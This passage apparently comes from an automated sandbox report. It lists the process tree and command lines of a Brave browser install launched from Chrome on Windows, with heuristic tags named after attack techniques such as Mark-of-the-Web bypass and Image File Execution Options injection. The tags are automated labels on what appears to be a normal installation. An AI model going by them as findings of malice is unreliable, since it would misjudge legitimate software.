  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ff83b28cc40,0x7ff83b28cc4c,0x7ff83b28cc58
  2⤵
  PID:224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1836,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1828 /prefetch:2
  2⤵
  PID:924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1968,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2020 /prefetch:3
  2⤵
  PID:4800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2032,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2224 /prefetch:8
  2⤵
  PID:488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3016,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3040 /prefetch:1
  2⤵
  PID:4860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3028,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3076 /prefetch:1
  2⤵
  PID:2360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4372,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3648 /prefetch:1
  2⤵
  PID:2976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4544,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4748 /prefetch:8
  2⤵
  PID:2064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4348,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:1
  2⤵
  PID:1992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5072,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5064 /prefetch:1
  2⤵
  PID:4524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4408,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5416 /prefetch:8
  2⤵
  PID:4028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5404,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5536 /prefetch:8
  2⤵
  PID:3124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5128,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5696 /prefetch:8
  2⤵
  PID:4736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5708,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5844 /prefetch:8
  2⤵
  PID:1692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5988,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6004 /prefetch:8
  2⤵
  PID:4828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5420,i,14426738636143469307,14859614154916475801,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5292 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:4804
- C:\Users\Admin\Downloads\BraveBrowserSetup-BRV002.exe
  "C:\Users\Admin\Downloads\BraveBrowserSetup-BRV002.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - NTFS ADS
  PID:3764
- - C:\Windows\SystemTemp\GUM5197.tmp\BraveUpdate.exe
    C:\Windows\SystemTemp\GUM5197.tmp\BraveUpdate.exe /installsource taggedmi /install "appguid={AFE6A462-C574-4B8A-AF43-4CC60DF4563B}&appname=Brave-Release&needsadmin=prefers&ap=release&installdataindex=default&referral=none"
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3504
  - - C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
      "C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /regsvc
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:3080
  - - C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
      "C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /regserver
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2952
    - - C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveUpdateComRegisterShell64.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:4716
    - - C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveUpdateComRegisterShell64.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:3772
    - - C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveUpdateComRegisterShell64.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:2564
  - - C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
      "C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNjEuMTUxIiBzaGVsbF92ZXJzaW9uPSIxLjMuMzYxLjE1MSIgaXNtYWNoaW5lPSIxIiBzZXNzaW9uaWQ9InsyN0Q5RTEwMS1FQ0Y0LTQ0NTktQjkyNi02OThGRERFNDQ1NDh9IiBpbnN0YWxsc291cmNlPSJ0YWdnZWRtaSIgdGVzdHNvdXJjZT0iYXV0byIgcmVxdWVzdGlkPSJ7OTZFNDkzNTAtREZDOC00RjUwLTk3OEItN0MyQzhEREM0OTJDfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBwaHlzbWVtb3J5PSI4IiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0Ii8-PGFwcCBhcHBpZD0ie0IxMzFDOTM1LTlCRTYtNDFEQS05NTk5LTFGNzc2QkVCODAxOX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEuMy4zNjEuMTUxIiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBpbnN0YWxsX3RpbWVfbXM9IjY2MiIvPjwvYXBwPjwvcmVxdWVzdD4
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      PID:4428
  - - C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
      "C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /handoff "appguid={AFE6A462-C574-4B8A-AF43-4CC60DF4563B}&appname=Brave-Release&needsadmin=prefers&ap=release&installdataindex=default&referral=none" /installsource taggedmi /sessionid "{27D9E101-ECF4-4459-B926-698FDDE44548}"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3512

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1628

C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /svc
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1860
- C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\brave_installer-x64.exe
  "C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\brave_installer-x64.exe" --do-not-launch-chrome /installerdata="C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\guiACC7.tmp"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2608
- - C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\CR_25956.tmp\setup.exe
    "C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\CR_25956.tmp\setup.exe" --install-archive="C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\CR_25956.tmp\CHROME.PACKED.7Z" --do-not-launch-chrome /installerdata="C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\guiACC7.tmp" --brave-referral-code="BRV002"
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Modifies registry class
    PID:864
  - - C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\CR_25956.tmp\setup.exe
      "C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\CR_25956.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://cr.brave.com --annotation=plat=Win64 --annotation=prod=Brave --annotation=ver=131.1.73.104 --initial-client-data=0x294,0x298,0x29c,0x270,0x2a0,0x7ff7a53df418,0x7ff7a53df424,0x7ff7a53df430
      4⤵
      Executes dropped EXE
      PID:912
  - - C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\CR_25956.tmp\setup.exe
      "C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\CR_25956.tmp\setup.exe" --system-level --verbose-logging --installerdata="C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\guiACC7.tmp" --create-shortcuts=0 --install-level=1
      4⤵
      Executes dropped EXE
      PID:4600
    - - C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\CR_25956.tmp\setup.exe
        
        "C:\Program Files (x86)\BraveSoftware\Update\Install\{B1FFBA49-FCE2-40B5-A9F1-086D2E4A7438}\CR_25956.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://cr.brave.com --annotation=plat=Win64 --annotation=prod=Brave --annotation=ver=131.1.73.104 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff7a53df418,0x7ff7a53df424,0x7ff7a53df430
        5⤵
        Executes dropped EXE
        
        PID:3300
- C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
  "C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNjEuMTUxIiBzaGVsbF92ZXJzaW9uPSIxLjMuMzYxLjE1MSIgaXNtYWNoaW5lPSIxIiBzZXNzaW9uaWQ9InsyN0Q5RTEwMS1FQ0Y0LTQ0NTktQjkyNi02OThGRERFNDQ1NDh9IiBpbnN0YWxsc291cmNlPSJ0YWdnZWRtaSIgdGVzdHNvdXJjZT0iYXV0byIgcmVxdWVzdGlkPSJ7NjAwMjRFQ0QtMTVBMi00ODAwLUEzOUQtRkE5Q0FEQkQ4NjdDfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBwaHlzbWVtb3J5PSI4IiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0Ii8-PGFwcCBhcHBpZD0ie0FGRTZBNDYyLUM1NzQtNEI4QS1BRjQzLTRDQzYwREY0NTYzQn0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEzMS4xLjczLjEwNCIgYXA9InJlbGVhc2UiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiIGluc3RhbGxhZ2U9Ii0xIiBpbnN0YWxsZGF0ZT0iLTEiPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwczovL3VwZGF0ZXMtY2RuLmJyYXZlc29mdHdhcmUuY29tL2J1aWxkL0JyYXZlLVJlbGVhc2UvcmVsZWFzZS93aW4vMTMxLjEuNzMuMTA0L3g2NC9icmF2ZV9pbnN0YWxsZXIteDY0LmV4ZSIgZG93bmxvYWRlZD0iMTMwOTI4NjU2IiB0b3RhbD0iMTMwOTI4NjU2IiBkb3dubG9hZF90aW1lX21zPSIxNTAxOSIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzA3IiBzb3VyY2VfdXJsX2luZGV4PSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iMjk2IiBkb3dubG9hZF90aW1lX21zPSIxNTk4OCIgZG93bmxvYWRlZD0iMTMwOTI4NjU2IiB0b3RhbD0iMTMwOTI4NjU2IiBpbnN0YWxsX3RpbWVfbXM9IjI5NzE4Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1344

C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveUpdateOnDemand.exe
"C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveUpdateOnDemand.exe" -Embedding
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3816
- C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
  "C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /ondemand
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:784
- - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
    "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --from-installer
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks system information in the registry
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:4276
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Crashpad" --url=https://cr.brave.com --annotation=plat=Win64 --annotation=prod=Brave --annotation=ver=131.1.73.104 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8297c1d18,0x7ff8297c1d24,0x7ff8297c1d30
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4244
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --start-stack-profiler --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1932,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=1928 /prefetch:2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4148
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --start-stack-profiler --field-trial-handle=2016,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=2172 /prefetch:11
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1868
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=2380,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=2616 /prefetch:13
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1948
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=5518480136029469439 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3452,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=3484 /prefetch:1
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4504
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=5518480136029469439 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3508,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=3644 /prefetch:1
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:700
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=4960,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=4968 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3624
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=4980,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5028 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4552
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=4884,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5188 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3416
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=4896,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5344 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4376
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5040,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5488 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1816
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=4988,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5084 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:580
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5048,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5400 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1396
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=4880,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5244 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2760
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\Installer\chrmstp.exe
